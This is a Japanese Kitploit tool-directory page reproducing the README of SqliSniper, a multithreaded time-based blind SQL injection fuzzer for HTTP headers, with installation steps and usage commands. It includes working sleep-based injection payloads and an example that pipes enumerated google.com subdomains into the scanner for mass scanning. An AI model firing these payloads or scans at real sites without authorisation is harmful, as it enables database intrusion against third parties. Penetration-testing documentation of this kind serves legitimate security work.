Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SqliSniper — HTTPヘッダー向け高度な時間ベースのブラインドSQLインジェクションファザー | Kitploit
ツール/GitHubGitHub/danialhalo/sqlisniper
脆弱性スキャナーウェブセキュリティファジング
GitHubdanialhalo/sqlisniper

SqliSniper

HTTPヘッダー向け高度な時間ベースのブラインドSQLインジェクションファザー

リポジトリを見る
313502年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

httpx

機能 • インストール • 使い方 • SqliSniperの実行 • 貢献 •

SqliSniper は、HTTPリクエストヘッダー内の時間ベースのブラインドSQLインジェクションを検出するために設計された堅牢なPythonツールです。マルチスレッドを使用して迅速にスキャンし、潜在的な脆弱性を特定することで、セキュリティ評価プロセスを強化し、速度と効率を確保します。他のスキャナとは異なり、SqliSniperは誤検出を排除し、検出時にアラートを送信するように設計されており、内蔵のDiscord通知機能を備えています。

alt text

主な機能

  • 時間ベースのブラインドSQLインジェクション検出: HTTPヘッダー内の潜在的なSQLインジェクションの脆弱性を特定します。
  • マルチスレッドスキャン: 並列処理により高速なスキャンを実現します。
  • Discord通知: 検出された脆弱性についてDiscord Webhook経由でアラートを送信します。
  • 誤検出チェック: 応答時間分析を実装し、真陽性と誤警報を区別します。
  • カスタムペイロードとヘッダーのサポート: ユーザーがターゲットスキャン用のカスタムペイロードとヘッダーを定義できるようにします。

インストール

root@kitploit:~
git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt

使い方

これはツールのヘルプを表示します。サポートされているすべてのオプションは以下の通りです。

root@kitploit:~
ubuntu:~/sqlisniper$ ./sqlisniper.py -h


███████╗ ██████╗ ██╗     ██╗    ███████╗███╗   ██╗██╗██████╗ ███████╗██████╗
██╔════╝██╔═══██╗██║     ██║    ██╔════╝████╗  ██║██║██╔══██╗██╔════╝██╔══██╗
███████╗██║   ██║██║     ██║    ███████╗██╔██╗ ██║██║██████╔╝█████╗  ██████╔╝
╚════██║██║▄▄ ██║██║     ██║    ╚════██║██║╚██╗██║██║██╔═══╝ ██╔══╝  ██╔══██╗
███████║╚██████╔╝███████╗██║    ███████║██║ ╚████║██║██║     ███████╗██║  ██║
╚══════╝ ╚══▀▀═╝ ╚══════╝╚═╝    ╚══════╝╚═╝  ╚═══╝╚═╝╚═╝     ╚══════╝╚═╝  ╚═╝

                            -: By Muhammad Danial :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
                     [--threads THREADS]

Detect SQL injection by sending malicious queries

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Single URL for the target
  -r URLS_FILE, --urls_file URLS_FILE
                        File containing a list of URLs
  -p, --pipeline        Read from pipeline
  --proxy PROXY         Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
  --payload PAYLOAD     File containing malicious payloads (default is payloads.txt)
  --single-payload SINGLE_PAYLOAD
                        Single payload for testing
  --discord DISCORD     Discord Webhook URL
  --headers HEADERS     File containing headers (default is headers.txt)
  --threads THREADS     Number of threads

SqliSniperの実行

単一URLスキャン

URLは -uフラグ で指定し、単一サイトをスキャンします。

root@kitploit:~
./sqlisniper.py -u http://example.com

ファイル入力

-rフラグ を使用すると、SqliSniperは複数のURLを含むファイルを読み取り、同時にスキャンできます。

root@kitploit:~
./sqlisniper.py -r url.txt

パイプ入力

SqliSniperは -pフラグ を使用してパイプライン入力でも動作します。

root@kitploit:~
cat url.txt | ./sqlisniper.py -p

パイプライン機能により、他のツールとのシームレスな統合が可能になります。例えば、subfinderやhttpxなどのツールを使用し、その出力をSqliSniperにパイプして大量スキャンを行うことができます。

root@kitploit:~
subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

カスタムペイロードでのスキャン

デフォルトでは、SqliSniperはpayloads.txtファイルを使用します。しかし、--payloadフラグ を使用してカスタムペイロードファイルを指定できます。

root@kitploit:~
./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

カスタムペイロードファイルを使用する際は、スリープ時間を %__TIME_OUT__% に置き換えてください。SqliSniperは、誤検出を軽減するためにスリープ時間を動的に調整します。 ペイロードファイルは次のようになります。

root@kitploit:~
ubuntu:~/sqlisniper$ cat payloads.txt 
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z

単一ペイロードでのスキャン

単一のペイロードのみをテストしたい場合は、--single-payloadフラグ を使用できます。スリープ時間を %__TIME_OUT__% に置き換えることを忘れないでください。

root@kitploit:~
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

カスタムヘッダーのスキャン

ヘッダーはheaders.txtファイルに保存されます。カスタムヘッダーをスキャンするには、カスタムHTTPリクエストヘッダーをheaders.txtファイルに保存してください。

root@kitploit:~
ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1

Discordアラート通知の送信

SqliSniperはDiscordアラート通知も提供し、Discord Webhookを介してリアルタイムアラートを提供することで機能を強化します。この機能は大規模スキャン中に非常に役立ち、検出時に迅速な通知を可能にします。

root@kitploit:~
./sqlisniper.py -r url.txt --discord <web_hookurl>

マルチスレッド

スレッド数は --threadsフラグ で指定できます。

root@kitploit:~
 ./sqlisniper.py -r url.txt --threads 10

注: スレッド数を多くすると、誤検出が発生したり、有効な問題を見落としたりする可能性があることに注意することが重要です。時間ベースのSQLインジェクションの性質上、より正確な検出のためには低いスレッド数を使用することをお勧めします。


法的免責事項

事前の相互同意なしにこのツールを使用してターゲットを攻撃することは固く禁止されています。該当するすべての地方、州、連邦法を遵守するのはエンドユーザーの責任です。開発者は一切の責任を負わず、このプログラムの誤用または損害についても責任を負いません。


貢献

SqliSniperへの貢献はいつでも歓迎します。機能拡張、バグ修正、ドキュメント改善など、どんな小さな助けでも感謝します。

ライセンス

SqliSniper は MITライセンス の下で配布されています。


SqliSniper は python たくさんの💙を込めて @Muhammad Danial によって作られました。

ツールをダウンロード